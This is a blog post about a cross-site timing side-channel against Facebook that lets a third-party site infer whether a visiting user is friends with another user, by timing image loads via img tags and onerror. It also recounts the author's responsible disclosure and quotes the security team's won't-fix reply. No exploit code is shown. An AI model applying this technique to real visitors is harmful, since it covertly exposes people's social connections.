Continuing on the subjects of timing attacks, I recently found a small timing attack exploit on Facebook. I sent a disclosure to the security team but it wasn’t found to be serious enough to warrant a bug bounty. I did not expect it to be so either, and I agree with the response I got from the Facebook engineer.
The exploit is simple. Imagine a Facebook user A is visiting my site, and I want to know if A is friends with another user B, whom I am friends with. I time how long it takes to load an image from facebook uploaded by a target user and compare it to the time taken to load an image which the user A definitely does not have access to.
If it takes longer to load the user B’s image, then the user A has access to it.
The way this works is that the response from the server behavious differently depending on if user A has access or not. It sends less data and perhaps short circuits if the user does not have access, resulting in a faster response time. On my network it took 300 ms longer for the server to respond if the user had access than if not, enough to reliably tell the difference.
I wrote a proof of concept and set up 3 test accounts to test it. I used img tags and the onerror attribute to get the timing information. This way I get past Facebook’s iframe limitations. See the exploit code here.
Of course, this is a very minor exploit since you could likely get the same information by looking at user B’s friendslist unless he explicity disabled it in the privacy settings. Perhaps the same type of attack can be used elsewhere to learn more private information. Either way, I feel like I learned something new while coding this exploit.
In case you were interested, here is the reply I got from facebook:
This is an interesting idea! Like you, I don't know how something like this would be fixed. The simplest idea would be to slow down the fast requests by X amount, so they match the speed of the Y (slower) requests, but can you imagine going to a product team and asking something like, "Hey, can we slow down 98% of all requests on the entire site, globally, so that they're never faster than our slowest requests?"
I don't think this is something we could reasonably fix, even ignoring the problems and confounding variables of network latency, etc -- all those things that would reduce the practicality of this.
Unfortunately, I think all of the above makes this ineligible as a bug bounty. Still, I applaud the creative thinking here and hope you'll continue to send in any security-related issues you find the future.
So I guess it’s marked as WONTFIX. I don’t disagree with his statement. Engineering something to prevent this would not be worth it for such a minor issue.